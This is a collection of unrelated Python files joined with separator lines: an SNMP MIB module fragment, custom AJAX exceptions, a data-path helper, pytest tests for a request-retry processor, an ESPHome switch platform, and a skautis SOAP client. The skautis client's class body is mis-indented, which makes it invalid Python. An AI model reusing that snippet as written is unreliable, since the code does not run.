if mibBuilder.loadTexts: sc5002FarEndUnavailableTimeRegStart.setDescription('Start time of one of the Unavailable Time Registers.')
sc5002FarEndUnavailableTimeRegStop = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 10, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002FarEndUnavailableTimeRegStop.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndUnavailableTimeRegStop.setDescription('Stop time of one of the Unavailable Time Registers.')
sc5002DiagTable = MibTable((1, 3, 6, 1, 4, 1, 498, 6, 8, 4, 1), )
if mibBuilder.loadTexts: sc5002DiagTable.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002DiagTable.setDescription('The GDC 5002 Diagnostics table. Information in the entries of this table support diagnostics testing, both active testing via patterns, and passive testing via loopbacks.')
sc5002DiagEntry = MibTableRow((1, 3, 6, 1, 4, 1, 498, 6, 8, 4, 1, 1), ).setIndexNames((0, "SC5002-MIB", "sc5002DiagIndex"))
if mibBuilder.loadTexts: sc5002DiagEntry.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002DiagEntry.setDescription('The GDC 5002 Diagnostics table entry.')
sc5002DiagIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 4, 1, 1, 1), SCinstance()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002DiagIndex.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002DiagIndex.setDescription('Integer value which uniquely identifies the SC5002 to which this entry is applicable. SCinstance is defined to be ssllddcc where: ss (byte value) - physical shelf slot location (01-32) ll (byte value) - line number (01-128) dd (byte value) - drop number (00-31) cc (byte value) - channel or interface number (always 00)')
sc5002LoopbackConfig = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 4, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("noLoopBack", 1), ("lineLoopBack", 2), ("unitTest", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: sc5002LoopbackConfig.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002LoopbackConfig.setDescription('Selects the test to run. A get of this object returns the test that is currently running. A set of noLoopBack(1) ends the test that is currently running. A set of lineLoopBack(2) starts a line loop back test. The line loop back test runs until a set of noLoopBack(1) is sent. A set of unitTest(3) starts a unit test. The unit test runs for 15 seconds.')
sc5002TestResult = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 4, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("pass", 1), ("fail", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002TestResult.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002TestResult.setDescription('The results of the last diagnostic test completed. The value returned is only valid if a get of sc5002LoopbackConfig returns noLoopBack(1).')
mibBuilder.exportSymbols("SC5002-MIB", sc5002NearEndSevErrSec=sc5002NearEndSevErrSec, sc5002CurrentFarEnd24HrIndex=sc5002CurrentFarEnd24HrIndex, sc5002PowerUp=sc5002PowerUp, sc5002LossOfFrame=sc5002LossOfFrame, sc5002RecentFarEnd24HrStat=sc5002RecentFarEnd24HrStat, sc5002ActiveFirmwareRev=sc5002ActiveFirmwareRev, sc5002RecentFarEnd24HrIndex=sc5002RecentFarEnd24HrIndex, sc5002NearEndAlarmCfgIdentifier=sc5002NearEndAlarmCfgIdentifier, sc5002MaintenanceLineIndex=sc5002MaintenanceLineIndex, sc5002FarEndAlarmCfgEntry=sc5002FarEndAlarmCfgEntry, sc5002NearEndCurrent15MinIndex=sc5002NearEndCurrent15MinIndex, sc5002FarEndCurrent15MinIndex=sc5002FarEndCurrent15MinIndex, sc5002NearEndResetStats=sc5002NearEndResetStats, sc5002DiagIndex=sc5002DiagIndex, sc5002NearEndLnCodeViol=sc5002NearEndLnCodeViol, sc5002VersionIndex=sc5002VersionIndex, sc5002FarEndResetStats=sc5002FarEndResetStats, gdc=gdc, sc5002FarEndCurrent15MinTable=sc5002FarEndCurrent15MinTable, sc5002FarEndUnavailableTimeRegTable=sc5002FarEndUnavailableTimeRegTable, sc5002DiagTable=sc5002DiagTable, sc5002FarEndUnavailableTimeRegIndex=sc5002FarEndUnavailableTimeRegIndex, sc5002DiagEntry=sc5002DiagEntry, sc5002FarEndUnavailableTimeRegStart=sc5002FarEndUnavailableTimeRegStart, sc5002StoredFirmwareStatus=sc5002StoredFirmwareStatus, sc5002FarEndBkdBlkErr=sc5002FarEndBkdBlkErr, sc5002TestResult=sc5002TestResult, sc5002NearEndAlarmWindow=sc5002NearEndAlarmWindow, sc5002MaintenanceEntry=sc5002MaintenanceEntry, sc5002NearEndCurrent24HrEntry=sc5002NearEndCurrent24HrEntry, sc5002FarEndErrSec=sc5002FarEndErrSec, sc5002DiagRxErr=sc5002DiagRxErr, sc5002SwitchActiveFirmware=sc5002SwitchActiveFirmware, sc5002NoResponse=sc5002NoResponse, sc5002NearEndStatLastInitialized=sc5002NearEndStatLastInitialized, sc5002Alarms=sc5002Alarms, sc5002VersionTable=sc5002VersionTable, sc5002NearEndCurrent24HrStat=sc5002NearEndCurrent24HrStat, sc5002NearEndAlarmCfgIndex=sc5002NearEndAlarmCfgIndex, 
sc5002RecentFarEnd24HrTable=sc5002RecentFarEnd24HrTable, sc5002Performance=sc5002Performance, sc5002NearEndRecent24HrStat=sc5002NearEndRecent24HrStat, sc5002FarEndIntervalIndex=sc5002FarEndIntervalIndex, sc5002NearEndAlarmCfgTable=sc5002NearEndAlarmCfgTable, sc5002CurrentFarEnd24HrStat=sc5002CurrentFarEnd24HrStat, sc5002AlarmData=sc5002AlarmData, sc5002FarEndIntervalNumber=sc5002FarEndIntervalNumber, sc5002FarEndIntervalTable=sc5002FarEndIntervalTable, sc5002CurrentFarEnd24HrTable=sc5002CurrentFarEnd24HrTable, sc5002NearEndCurrent15MinStat=sc5002NearEndCurrent15MinStat, sc5002FarEndValidIntervals=sc5002FarEndValidIntervals, sc5002AlarmIndSignal=sc5002AlarmIndSignal, sc5002FarEndUnavlSec=sc5002FarEndUnavlSec, sc5002NearEndErrSec=sc5002NearEndErrSec, sc5002E1SignalingMode=sc5002E1SignalingMode, sc5002NearEndCurrent24HrTable=sc5002NearEndCurrent24HrTable, dsx1=dsx1, sc5002NearEndValidIntervals=sc5002NearEndValidIntervals, sc5002LoopbackConfig=sc5002LoopbackConfig, sc5002NetworkCfgTable=sc5002NetworkCfgTable, sc5002NearEndRecent24HrEntry=sc5002NearEndRecent24HrEntry, sc5002FarEndIntervalStat=sc5002FarEndIntervalStat, sc5002FarEndIntervalEntry=sc5002FarEndIntervalEntry, sc5002NearEndCurrent24HrIndex=sc5002NearEndCurrent24HrIndex, sc5002NetworkCfg=sc5002NetworkCfg, sc5002FarEndSevErrSec=sc5002FarEndSevErrSec, sc5002FarEndCurrent15MinStat=sc5002FarEndCurrent15MinStat, sc5002CurrentFarEnd24HrEntry=sc5002CurrentFarEnd24HrEntry, sc5002NvRamCorrupt=sc5002NvRamCorrupt, sc5002NearEndUnavailableTimeRegTable=sc5002NearEndUnavailableTimeRegTable, sc5002NetworkCfgIndex=sc5002NetworkCfgIndex, sc5002FarEndStatLastInitialized=sc5002FarEndStatLastInitialized, sc5002NearEndUnavailableTimeRegStart=sc5002NearEndUnavailableTimeRegStart, sc5002NearEndCurrent15MinTable=sc5002NearEndCurrent15MinTable, sc5002FarEndAlarmCfgIdentifier=sc5002FarEndAlarmCfgIdentifier, sc5002NearEndAlarmCfgEntry=sc5002NearEndAlarmCfgEntry, sc5002DownloadingMode=sc5002DownloadingMode, 
sc5002FirmwareRev=sc5002FirmwareRev, sc5002NearEndUnavailableTimeRegStop=sc5002NearEndUnavailableTimeRegStop, sc5002Version=sc5002Version, sc5002NearEndIntervalNumber=sc5002NearEndIntervalNumber, sc5002LedStatus=sc5002LedStatus, sc5002NearEndRecent24HrTable=sc5002NearEndRecent24HrTable, sc5002RecentFarEnd24HrEntry=sc5002RecentFarEnd24HrEntry, sc5002VersionEntry=sc5002VersionEntry, sc5002FarEndCurrent15MinEntry=sc5002FarEndCurrent15MinEntry, sc5002NetworkCfgEntry=sc5002NetworkCfgEntry, sc5002FarEndAlarmCfgIndex=sc5002FarEndAlarmCfgIndex, sc5002UnitFailure=sc5002UnitFailure, sc5002NearEndUnavailableTimeRegEntry=sc5002NearEndUnavailableTimeRegEntry, sc5002DefaultInit=sc5002DefaultInit, sc5002NearEndAlarmThreshold=sc5002NearEndAlarmThreshold, sc5002NearEndBkdBlkErr=sc5002NearEndBkdBlkErr, sc5002Maintenance=sc5002Maintenance, sc5002SoftReset=sc5002SoftReset, sc5002NearEndUnavailableTimeRegIndex=sc5002NearEndUnavailableTimeRegIndex, sc5002NearEndCurrent15MinEntry=sc5002NearEndCurrent15MinEntry, sc5002MIBversion=sc5002MIBversion, sc5002BootRev=sc5002BootRev, sc5002NearEndIntervalEntry=sc5002NearEndIntervalEntry, sc5002FarEndAlarmCfgTable=sc5002FarEndAlarmCfgTable, sc5002NearEndUnavailableTimeRegNumber=sc5002NearEndUnavailableTimeRegNumber, sc5002TimingLoss=sc5002TimingLoss, sc5002FarEndAlarmThreshold=sc5002FarEndAlarmThreshold, sc5002NearEndIntervalIndex=sc5002NearEndIntervalIndex, sc5002NearEndIntervalStat=sc5002NearEndIntervalStat, sc5002NearEndIntervalTable=sc5002NearEndIntervalTable, sc5002FarEndUnavailableTimeRegStop=sc5002FarEndUnavailableTimeRegStop, sc5002FarEndUnavailableTimeRegNumber=sc5002FarEndUnavailableTimeRegNumber, sc5002=sc5002, sc5002FarEndUnavailableTimeRegEntry=sc5002FarEndUnavailableTimeRegEntry, sc5002FallbackTimingActive=sc5002FallbackTimingActive, sc5002NearEndUnavlSec=sc5002NearEndUnavlSec, sc5002FarEndAlarmWindow=sc5002FarEndAlarmWindow, sc5002MaintenanceTable=sc5002MaintenanceTable, sc5002SysUpTime=sc5002SysUpTime, 
sc5002NearEndRecent24HrIndex=sc5002NearEndRecent24HrIndex, sc5002LossOfSignal=sc5002LossOfSignal, sc5002StoredFirmwareRev=sc5002StoredFirmwareRev, sc5002Diagnostics=sc5002Diagnostics)
|
# -*- mode: python; coding: utf-8; -*-
""" Custom exceptions """
class AjaxException(Exception):
    """Root of the AJAX exception hierarchy; catch this for any AJAX error."""
class Ajax404(AjaxException):
    """Raised when the object requested via AJAX does not exist."""
class AjaxDataException(AjaxException):
    """Carries a JSON-serializable payload to be pushed into the response.

    The payload is available on the instance as ``data``; any remaining
    positional/keyword arguments are forwarded to ``Exception``.
    """

    def __init__(self, data, *args, **kwargs):
        # Stash the payload so the response layer can serialize it later.
        self.data = data
        super().__init__(*args, **kwargs)
class RedirectException(Exception):
    """Signals that the current request should be answered with a redirect.

    The optional ``notice_message`` and ``error_message`` keyword arguments
    are stored on the instance and removed from the kwargs forwarded to
    ``Exception``; both default to ``None`` when not supplied.
    """

    def __init__(self, redirect_uri, *args, **kwargs):
        self.redirect_uri = redirect_uri
        # Consume the message kwargs here so Exception never sees them.
        self.notice_message = kwargs.pop('notice_message', None)
        self.error_message = kwargs.pop('error_message', None)
        super().__init__(*args, **kwargs)
|
'''Library of common utilities shared between notebooks in SIRF-Exercises.'''
# Author: Ashley Gillman
# Copyright 2021 Commonwealth Scientific and Industrial Research Organisation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
def exercises_data_path(*data_type):
    '''
    Returns the path to data used by SIRF-exercises.

    data_type: either 'PET', 'MR' or 'Synergistic', or use multiple arguments for
    subdirectories like exercises_data_path('PET', 'mMR', 'NEMA_IQ').
    '''
    try:
        from .data_path import data_path  # generated by the installer
    except ImportError:
        # Not installed: fall back to the environment variable set by the
        # download script, and fail loudly when it is absent or stale.
        data_path = os.environ.get('SIRF_EXERCISES_DATA_PATH')
        if not (data_path and os.path.exists(data_path)):
            raise RuntimeError(
                "Exercises data weren't found. Please run download_data.sh in the "
                "scripts directory")
    return os.path.join(data_path, *data_type)
import pytest
from autoextract.aio.client import RequestProcessor
from autoextract.aio.errors import _QueryError
def test_request_processor_without_retries():
    # Two article queries; no retry budget is configured.
    query = [
        {
            "url": "https://example.org/first",
            "pageType": "article",
        },
        {
            "url": "https://example.org/second",
            "pageType": "article",
        },
    ]
    processor = RequestProcessor(query=query)

    # Before any response is processed there are no results yet and
    # every query is still pending.
    assert processor.get_latest_results() == []
    assert processor.pending_queries == query

    # A response containing one success and one error.
    response = [
        {
            "query": {
                "id": "1",
                "domain": "example.org",
                "userQuery": {
                    "url": "https://example.org/first",
                    "pageType": "article"
                }
            },
            "article": {
                "name": "My first article",
            },
        },
        {
            "query": {
                "id": "2",
                "domain": "example.org",
                "userQuery": {
                    "url": "https://example.org/second",
                    "pageType": "article"
                }
            },
            "error": "Proxy error: internal_error",
        },
    ]
    results = processor.process_results(response)

    # The response is reported as-is, both directly and via
    # get_latest_results, and nothing is queued for retry because
    # retries are disabled by default.
    assert results == response
    assert processor.get_latest_results() == results
    assert processor.pending_queries == []
def test_request_processor_with_not_retriable_error():
    """Non-retriable errors are returned as results, not re-queued."""
    queries = [
        {"url": "https://example.org/first", "pageType": "article"},
        {"url": "https://example.org/second", "pageType": "article"},
    ]
    processor = RequestProcessor(query=queries, max_retries=3)

    # Fresh processor: no results yet, everything still pending.
    assert processor.get_latest_results() == []
    assert processor.pending_queries == queries

    # One success plus an HTTP 404, which is not a retriable error.
    response = [
        {
            "query": {
                "id": "1",
                "domain": "example.org",
                "userQuery": {"url": "https://example.org/first",
                              "pageType": "article"},
            },
            "article": {"name": "My first article"},
        },
        {
            "query": {
                "id": "2",
                "domain": "example.org",
                "userQuery": {"url": "https://example.org/second",
                              "pageType": "article"},
            },
            "error": "Downloader error: http404",
        },
    ]

    # No _QueryError should be raised for a non-retriable error.
    outcome = processor.process_results(response)

    assert outcome == response
    assert processor.get_latest_results() == outcome
    # Nothing is left to retry even though max_retries allows it.
    assert processor.pending_queries == []
def test_request_processor_with_retries():
    """Retriable errors are re-queued until a success finally arrives."""
    def success(query_id, url, name):
        # A response entry that extracted an article successfully.
        return {
            "query": {
                "id": query_id,
                "domain": "example.org",
                "userQuery": {"url": url, "pageType": "article"},
            },
            "article": {"name": name},
        }

    def failure(query_id, url, message):
        # A response entry that carries an error message.
        return {
            "query": {
                "id": query_id,
                "domain": "example.org",
                "userQuery": {"url": url, "pageType": "article"},
            },
            "error": message,
        }

    queries = [
        {"url": "https://example.org/first", "pageType": "article"},
        {"url": "https://example.org/second", "pageType": "article"},
    ]
    processor = RequestProcessor(query=queries, max_retries=3)

    # Fresh processor: no results yet, everything still pending.
    assert processor.get_latest_results() == []
    assert processor.pending_queries == queries

    # First response: one success, one retriable error.
    first = [
        success("1", "https://example.org/first", "My first article"),
        failure("2", "https://example.org/second",
                "Proxy error: internal_error"),
    ]
    with pytest.raises(_QueryError):
        processor.process_results(first)
    assert processor.get_latest_results() == first
    # The failed user query is kept for a retry.
    assert processor.pending_queries == [first[1]["query"]["userQuery"]]

    # Second response: the retried query fails again.
    second = [
        failure("3", "https://example.org/second",
                "Proxy error: internal_error"),
    ]
    with pytest.raises(_QueryError):
        processor.process_results(second)
    # Earlier successes are kept; the error entry is the most recent one.
    assert processor.get_latest_results() == [first[0], second[0]]
    assert processor.pending_queries == [second[0]["query"]["userQuery"]]

    # Third response: the retried query finally succeeds.
    third = [
        success("4", "https://example.org/second", "My second article"),
    ]
    outcome = processor.process_results(third)
    # Combined successes from all attempts, nothing left to retry.
    assert outcome == [first[0], third[0]]
    assert processor.get_latest_results() == outcome
    assert processor.pending_queries == []
@pytest.mark.parametrize("message, retry_seconds, domain_occupied", [
    ("Domain example.com is occupied, please retry in 23.5 seconds", 23.5, True),
    ("Domain example.com is occupied, please retry in 14 seconds", 14.0, True),
    ("Proxy error: timeout", 0.0, False),
])
def test_request_processor_exception_priority(
        message, retry_seconds, domain_occupied):
    """The raised _QueryError reflects the highest-priority error,
    regardless of the order of the errored queries in the response."""
    queries = [
        {"url": "https://example.org/first", "pageType": "article"},
        {"url": "https://example.org/second", "pageType": "article"},
    ]
    processor = RequestProcessor(query=queries, max_retries=3)

    # Fresh processor: no results yet, everything still pending.
    assert processor.get_latest_results() == []
    assert processor.pending_queries == queries

    # Two errored entries: the parametrized message and a plain
    # internal_error competing for exception priority.
    response = [
        {
            "query": {
                "id": "1",
                "domain": "example.org",
                "userQuery": {"url": "https://example.org/first",
                              "pageType": "article"},
            },
            "error": message,
        },
        {
            "query": {
                "id": "2",
                "domain": "example.org",
                "userQuery": {"url": "https://example.org/second",
                              "pageType": "article"},
            },
            "error": "Proxy error: internal_error",
        },
    ]

    # Process the response in both orderings; the raised error must be
    # the same either way.
    for _ in range(2):
        with pytest.raises(_QueryError) as exc_info:
            processor.process_results(response)
        assert bool(exc_info.value.domain_occupied) is domain_occupied
        assert exc_info.value.retry_seconds == retry_seconds
        response.reverse()
|
import voluptuous as vol
import esphomeyaml.config_validation as cv
from esphomeyaml.components import switch
from esphomeyaml.const import CONF_INVERTED, CONF_MAKE_ID, CONF_NAME
from esphomeyaml.cpp_generator import variable
from esphomeyaml.cpp_types import Application, App
# C++ helper struct generated in the application namespace for this platform.
MakeShutdownSwitch = Application.struct('MakeShutdownSwitch')
# The ShutdownSwitch C++ class, declared inside the switch namespace.
ShutdownSwitch = switch.switch_ns.class_('ShutdownSwitch', switch.Switch)
# Config schema: allocates variable IDs for the switch and its Make struct,
# and explicitly rejects `inverted` since it makes no sense for a shutdown switch.
PLATFORM_SCHEMA = cv.nameable(switch.SWITCH_PLATFORM_SCHEMA.extend({
    cv.GenerateID(): cv.declare_variable_id(ShutdownSwitch),
    cv.GenerateID(CONF_MAKE_ID): cv.declare_variable_id(MakeShutdownSwitch),
    vol.Optional(CONF_INVERTED): cv.invalid("Shutdown switches do not support inverted mode!"),
}))
def to_code(config):
    """Emit the C++ code that creates and registers the shutdown switch."""
    make = variable(config[CONF_MAKE_ID],
                    App.make_shutdown_switch(config[CONF_NAME]))
    switch.setup_switch(make.Pshutdown, make.Pmqtt, config)
# Compile-time define enabling shutdown-switch support in the C++ firmware.
BUILD_FLAGS = '-DUSE_SHUTDOWN_SWITCH'
def to_hass_config(data, config):
    """Build the Home Assistant discovery payload for this switch."""
    hass_config = switch.core_to_hass_config(data, config)
    return hass_config
|
# -*- coding: utf-8 -*-
import zeep
# Web service for working with organizational units and persons
class OrganizationUnit(object):
__module__ = 'skautis'
def __init__(self, test):
if test:
self._client = zeep.Client('https://test-is.skaut.cz/JunakWebservice/OrganizationUnit.asmx?wsdl')
else:
self._client = zeep.Client('https://is.skaut.cz/JunakWebservice/OrganizationUnit.asmx?wsdl')
    # Update an economic statement.
    def StatementUpdate(self, ID_Login, ID, ID_Unit, Year, IsError, IsDelivered, DateDelivered, DateCreated, IsThousands, IsConsultant, ID_Document, ID_DocumentTempFile, DateSent, ID_PersonSent, DateConfirmed, ID_PersonConfirmed, ID_Registry, ShowOverview, Unit=None, RegistrationNumber=None, ID_StatementType=None, StatementType=None, ID_StatementState=None, StatementState=None, PersonSent=None, PersonConfirmed=None):
        """Proxy for the StatementUpdate SOAP operation; returns the service response."""
        return self._client.service.StatementUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "Year": Year, "IsError": IsError, "IsDelivered": IsDelivered, "DateDelivered": DateDelivered, "DateCreated": DateCreated, "IsThousands": IsThousands, "IsConsultant": IsConsultant, "ID_Document": ID_Document, "ID_DocumentTempFile": ID_DocumentTempFile, "DateSent": DateSent, "ID_PersonSent": ID_PersonSent, "DateConfirmed": DateConfirmed, "ID_PersonConfirmed": ID_PersonConfirmed, "ID_Registry": ID_Registry, "ShowOverview": ShowOverview, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "ID_StatementType": ID_StatementType, "StatementType": StatementType, "ID_StatementState": ID_StatementState, "StatementState": StatementState, "PersonSent": PersonSent, "PersonConfirmed": PersonConfirmed})
    # Load the list of troop types.
    def TroopArtAll(self, ID_Login, DisplayName=None):
        """Proxy for the TroopArtAll SOAP operation; returns the service response."""
        return self._client.service.TroopArtAll({"ID_Login": ID_Login, "DisplayName": DisplayName})
    # Load the list of units.
    def UnitAll(self, ID_Login, ID_Application, ID, ID_Group, ID_UnitParent, ID_UnitChild, ID_UnitTree, RegistrationNumberStartWith, ID_AlignmentType, ID_UnitType=None, RegistrationNumber=None, DisplayName=None, Location=None, AccountNumber=None, IC=None):
        """Proxy for the UnitAll SOAP operation; returns the service response."""
        return self._client.service.UnitAll({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID": ID, "ID_Group": ID_Group, "ID_UnitParent": ID_UnitParent, "ID_UnitChild": ID_UnitChild, "ID_UnitTree": ID_UnitTree, "RegistrationNumberStartWith": RegistrationNumberStartWith, "ID_AlignmentType": ID_AlignmentType, "ID_UnitType": ID_UnitType, "RegistrationNumber": RegistrationNumber, "DisplayName": DisplayName, "Location": Location, "AccountNumber": AccountNumber, "IC": IC})
    # Load the list of a unit's contacts.
    def UnitContactAll(self, ID_Login, ID_Application, ID_Unit, Publish, ID_ContactType=None):
        """Proxy for the UnitContactAll SOAP operation; returns the service response."""
        return self._client.service.UnitContactAll({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID_Unit": ID_Unit, "Publish": Publish, "ID_ContactType": ID_ContactType})
    # Delete a unit contact.
    def UnitContactDelete(self, ID_Login, ID):
        """Proxy for the UnitContactDelete SOAP operation; returns the service response."""
        return self._client.service.UnitContactDelete({"ID_Login": ID_Login, "ID": ID})
    # Create a unit contact.
    def UnitContactInsert(self, ID_Login, ID_Unit, ID, Publish, ID_ContactType=None, Value=None, Note=None):
        """Proxy for the UnitContactInsert SOAP operation; returns the service response."""
        return self._client.service.UnitContactInsert({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "ID": ID, "Publish": Publish, "ID_ContactType": ID_ContactType, "Value": Value, "Note": Note})
    # Update a unit contact.
    def UnitContactUpdate(self, ID_Login, ID_Unit, ID, Publish, ID_ContactType=None, Value=None, Note=None):
        """Proxy for the UnitContactUpdate SOAP operation; returns the service response."""
        return self._client.service.UnitContactUpdate({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "ID": ID, "Publish": Publish, "ID_ContactType": ID_ContactType, "Value": Value, "Note": Note})
    # Create a subordinate unit.
    def UnitInsertUnit(self, ID_Login, ID, ID_Group, ID_Unit, ContainsMembers, CommissionDeadline, IsVatPayer, ID_TroopArt, CanUpdateRegistrationNumber, IsUnitCancel, JournalParent, ChangeFreeJournal, ID_UnitParent, OnlyValidate, IsPostalAuthenticated, IsAddressAuthenticated, ID_PersonChangeName, DateChangeName, IsPropertyOwner, ID_TempFilePropertyAgreement, ID_DocumentDecision, ID_DocumentPropertyAgreement, ID_TempFileSeatChange, ID_UnitType=None, UnitType=None, DisplayName=None, SortName=None, RegistrationNumber=None, ShortRegistrationNumber=None, Location=None, IC=None, DIC=None, FileReference=None, Street=None, City=None, Postcode=None, State=None, PostalFirstLine=None, PostalStreet=None, PostalCity=None, PostalPostcode=None, PostalState=None, Note=None, TroopArt=None, LogoContent=None, LogoExtension=None, AddressDistrict=None, PostalDistrict=None, NewDisplayName=None, CompleteDisplayName=None, PersonChangeName=None, PropertyAgreementExtension=None, PropertyAgreementContent=None, TroopArtKey=None, ID_JournalNovice=None, ID_JournalDeliveryType=None, FullDisplayName=None, DecisionSeatChangeExtension=None, ShopDiscountBarcode=None, ID_UnitFoundReason=None, UnitFoundReason=None, UnitFoundDescription=None):
        """Proxy for the UnitInsertUnit SOAP operation; returns the service response."""
        return self._client.service.UnitInsertUnit({"ID_Login": ID_Login, "ID": ID, "ID_Group": ID_Group, "ID_Unit": ID_Unit, "ContainsMembers": ContainsMembers, "CommissionDeadline": CommissionDeadline, "IsVatPayer": IsVatPayer, "ID_TroopArt": ID_TroopArt, "CanUpdateRegistrationNumber": CanUpdateRegistrationNumber, "IsUnitCancel": IsUnitCancel, "JournalParent": JournalParent, "ChangeFreeJournal": ChangeFreeJournal, "ID_UnitParent": ID_UnitParent, "OnlyValidate": OnlyValidate, "IsPostalAuthenticated": IsPostalAuthenticated, "IsAddressAuthenticated": IsAddressAuthenticated, "ID_PersonChangeName": ID_PersonChangeName, "DateChangeName": DateChangeName, "IsPropertyOwner": IsPropertyOwner, "ID_TempFilePropertyAgreement": ID_TempFilePropertyAgreement, "ID_DocumentDecision": ID_DocumentDecision, "ID_DocumentPropertyAgreement": ID_DocumentPropertyAgreement, "ID_TempFileSeatChange": ID_TempFileSeatChange, "ID_UnitType": ID_UnitType, "UnitType": UnitType, "DisplayName": DisplayName, "SortName": SortName, "RegistrationNumber": RegistrationNumber, "ShortRegistrationNumber": ShortRegistrationNumber, "Location": Location, "IC": IC, "DIC": DIC, "FileReference": FileReference, "Street": Street, "City": City, "Postcode": Postcode, "State": State, "PostalFirstLine": PostalFirstLine, "PostalStreet": PostalStreet, "PostalCity": PostalCity, "PostalPostcode": PostalPostcode, "PostalState": PostalState, "Note": Note, "TroopArt": TroopArt, "LogoContent": LogoContent, "LogoExtension": LogoExtension, "AddressDistrict": AddressDistrict, "PostalDistrict": PostalDistrict, "NewDisplayName": NewDisplayName, "CompleteDisplayName": CompleteDisplayName, "PersonChangeName": PersonChangeName, "PropertyAgreementExtension": PropertyAgreementExtension, "PropertyAgreementContent": PropertyAgreementContent, "TroopArtKey": TroopArtKey, "ID_JournalNovice": ID_JournalNovice, "ID_JournalDeliveryType": ID_JournalDeliveryType, "FullDisplayName": FullDisplayName, "DecisionSeatChangeExtension": 
DecisionSeatChangeExtension, "ShopDiscountBarcode": ShopDiscountBarcode, "ID_UnitFoundReason": ID_UnitFoundReason, "UnitFoundReason": UnitFoundReason, "UnitFoundDescription": UnitFoundDescription})
    # Delete a unit registration defect.
    def UnitMistakeReportDelete(self, ID_Login, ID):
        """Proxy for the UnitMistakeReportDelete SOAP operation; returns the service response."""
        return self._client.service.UnitMistakeReportDelete({"ID_Login": ID_Login, "ID": ID})
    # Create a unit registration defect.
    def UnitMistakeReportInsert(self, ID_Login, ID, ID_Unit, ID_Mistake, Unit=None, RegistrationNumber=None, Mistake=None, DisplayName=None, ParentComment=None):
        """Proxy for the UnitMistakeReportInsert SOAP operation; returns the service response."""
        return self._client.service.UnitMistakeReportInsert({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_Mistake": ID_Mistake, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "Mistake": Mistake, "DisplayName": DisplayName, "ParentComment": ParentComment})
    # Load the list of a unit's registrations.
    def UnitRegistrationAll(self, ID_Login, ID_Unit, Year):
        """Proxy for the UnitRegistrationAll SOAP operation; returns the service response."""
        return self._client.service.UnitRegistrationAll({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "Year": Year})
    # Check the given unit registration and return the defects found.
    def UnitRegistrationCheck(self, ID_Login, ID):
        """Proxy for the UnitRegistrationCheck SOAP operation; returns the service response."""
        return self._client.service.UnitRegistrationCheck({"ID_Login": ID_Login, "ID": ID})
    # Load the detail of a unit registration.
    def UnitRegistrationDetail(self, ID_Login, ID, ID_Unit, Year, Instructions=None):
        """Proxy for the UnitRegistrationDetail SOAP operation; returns the service response."""
        return self._client.service.UnitRegistrationDetail({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "Year": Year, "Instructions": Instructions})
    # Create a unit registration.
    def UnitRegistrationInsert(self, ID_Login, ID, ID_Unit, Year, DateChecked, DateConfirmed, IsDelivered, IsAccepted, ID_UnitRegistrationParent, ParentIsDelivered, ParentIsAccepted, ParentHasCreated, Unit=None, RegistrationNumber=None, DisplayName=None, ID_UnitType=None, Instructions=None, UnitRegistrationParent=None, InstructionsParent=None):
        """Proxy for the UnitRegistrationInsert SOAP operation; returns the service response."""
        return self._client.service.UnitRegistrationInsert({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "Year": Year, "DateChecked": DateChecked, "DateConfirmed": DateConfirmed, "IsDelivered": IsDelivered, "IsAccepted": IsAccepted, "ID_UnitRegistrationParent": ID_UnitRegistrationParent, "ParentIsDelivered": ParentIsDelivered, "ParentIsAccepted": ParentIsAccepted, "ParentHasCreated": ParentHasCreated, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "DisplayName": DisplayName, "ID_UnitType": ID_UnitType, "Instructions": Instructions, "UnitRegistrationParent": UnitRegistrationParent, "InstructionsParent": InstructionsParent})
    # Update a unit registration.
    def UnitRegistrationUpdate(self, ID_Login, ID, ID_Unit, Year, DateChecked, DateConfirmed, IsDelivered, IsAccepted, ID_UnitRegistrationParent, ParentIsDelivered, ParentIsAccepted, ParentHasCreated, Unit=None, RegistrationNumber=None, DisplayName=None, ID_UnitType=None, Instructions=None, UnitRegistrationParent=None, InstructionsParent=None):
        """Proxy for the UnitRegistrationUpdate SOAP operation; returns the service response."""
